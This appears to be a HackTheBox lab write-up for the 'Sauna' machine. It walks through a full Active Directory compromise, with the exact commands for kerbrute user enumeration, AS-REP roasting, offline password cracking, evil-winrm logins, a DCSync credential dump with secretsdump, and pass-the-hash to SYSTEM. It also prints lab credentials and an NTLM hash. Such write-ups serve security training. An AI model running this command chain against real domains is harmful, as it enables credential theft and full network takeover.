Sauna

kerbrute, ASREProast, DCSync

IP

• LHOST: 10.10.14.15

• RHOST: 10.129.95.180

Nmap

Port scan:

PORT     STATE SERVICE
53/tcp   open  domain
80/tcp   open  http
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  http-rpc-epmap
636/tcp  open  ldapssl
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl

Script scan:

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
| http-methods: 
|_  Potentially risky methods: TRACE
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-07-10 16:55:50Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2022-07-10T16:56:17
|_  start_date: N/A
|_clock-skew: 7h00m00s

Full scan:

PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49667/tcp open  unknown
49673/tcp open  unknown
49674/tcp open  unknown
49676/tcp open  unknown
49694/tcp open  unknown
49719/tcp open  unknown



Making a script scan on extra ports: 5985, 9389, 49667, 49673, 49674, 49676, 49694, 49719



PORT      STATE SERVICE    VERSION
5985/tcp  open  http       Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf     .NET Message Framing
49667/tcp open  msrpc      Microsoft Windows RPC
49673/tcp open  ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc      Microsoft Windows RPC
49676/tcp open  msrpc      Microsoft Windows RPC
49694/tcp open  msrpc      Microsoft Windows RPC
49719/tcp open  msrpc      Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Port 445 (crackmapexec)

Enumerate SMB shares with crackmapexec:

crackmapexec smb $IP --shares

Here we learn that the NetBIOS name is sauna and the domain is egotistical-bank.local:

crackmapexec smb enumeration

Port 80 (username enumeration)

Recall that crackmapexec found a domain name:

egotistical-bank.local

Add the following entry to /etc/hosts:

10.129.181.201 egotistical-bank.local

In "About Us", we found a list of potential usernames:

potential usernames

Write down a list of possible usernames and save them as users.txt:

fsmith
scoins
hbear
btaylor
sdriver

This [firstname initial][lastname] username pattern is commonly used in HTB boxes. In real world, you may want to generate a list of potential usernames based on emails or company policy.

Port 88 (kerbrute)

Enumerate valid usernames with kerbrute:

kerbrute userenum -d egotistical-bank.local --dc $IP users.txt

Here we found a valid username fsmith@egotistical-bank.local:

kerbrute

Update users.txt:

fsmith

Foothold (ASREProast)

Now we have a valid username fsmith and we don't know his password. In such scenario, we can try ASREProast in order to get a TGT ticket and crack it offline. To learn the theory behind ASREProast, read the following post:

How To Attack Kerberos 101m0chan Blog - Info Sec, CTF & Hacking

How To Attack Kerberos 101

ASREProast with GetNPUsers:

impacket-GetNPUsers egotistical-bank.local/ -usersfile users.txt -dc-ip $IP

Note that the / in egotistical-bank.local/ is required, otherwise GetNPUsers won't recognize the string as a domain. It works:

GetNPUsers

Save the hash to a file named hash.txt:

impacket-GetNPUsers egotistical-bank.local/ -usersfile users.txt -dc-ip $IP -outputfile hash.txt

Crack the TGT ticket with John:

john-rockyou hash.txt

The plaintext password is Thestrokes23:

John

Since port 5985 is open and we have a valid credential fsmith:Thestrokes23, we can get shell with Evil-WinRM:

evil-winrm -i $IP -u fsmith -p Thestrokes23

Get a user shell as fsmith:

user shell

Lateral Movement (winPEAS)

Upload winPEAS via Evil-WinRM upload command and run it:

cd C:\Windows\Tasks
upload /usr/share/windows-resources/winPEAS/winPEASx64.exe
.\winPEASx64.exe

winPEAS found an AutoLogon credential svc_loanmanager:Moneymakestheworldgoround!:

winPEAS

However, the user svc_loanmanager does not exist. Further enumeration shows that there exists a user svc_loanmgr:

net user

Try getting shell with credential svc_loanmgr:Moneymakestheworldgoround! via Evil-WinRM:

evil-winrm -i $IP -u svc_loanmgr -p Moneymakestheworldgoround!

Get shell as svc_loanmgr:

lateral movement

Privilege Escalation (DCSync)

Upload adPEAS via Evil-WinRM upload command and run it:

cd C:\Windows\Tasks
upload /usr/share/windows-resources/adPEAS/adPEAS.ps1
. .\adPEAS.ps1
Invoke-adPEAS

adPEAS found that svc_loanmgr has DCSync rights:

adPEAS

Since we know the credential of svc_loanmgr, we can do DCSync with secretsdump from Kali:

impacket-secretsdump 'egotistical-bank.local/svc_loanmgr:Moneymakestheworldgoround!'@$IP

secretsdump found Administrator's NTLM hash:

secretsdump

The NTLM hash is:

823452073d75b9d1cf70ebdf86c7f98e

Recall that Evil-WinRM can do pass the hash, therefore we don't have to crack this hash. Try pass the hash with Evil-WinRM:

evil-winrm -i $IP -u Administrator -H 823452073d75b9d1cf70ebdf86c7f98e

Get SYSTEM shell:

SYSTEM shell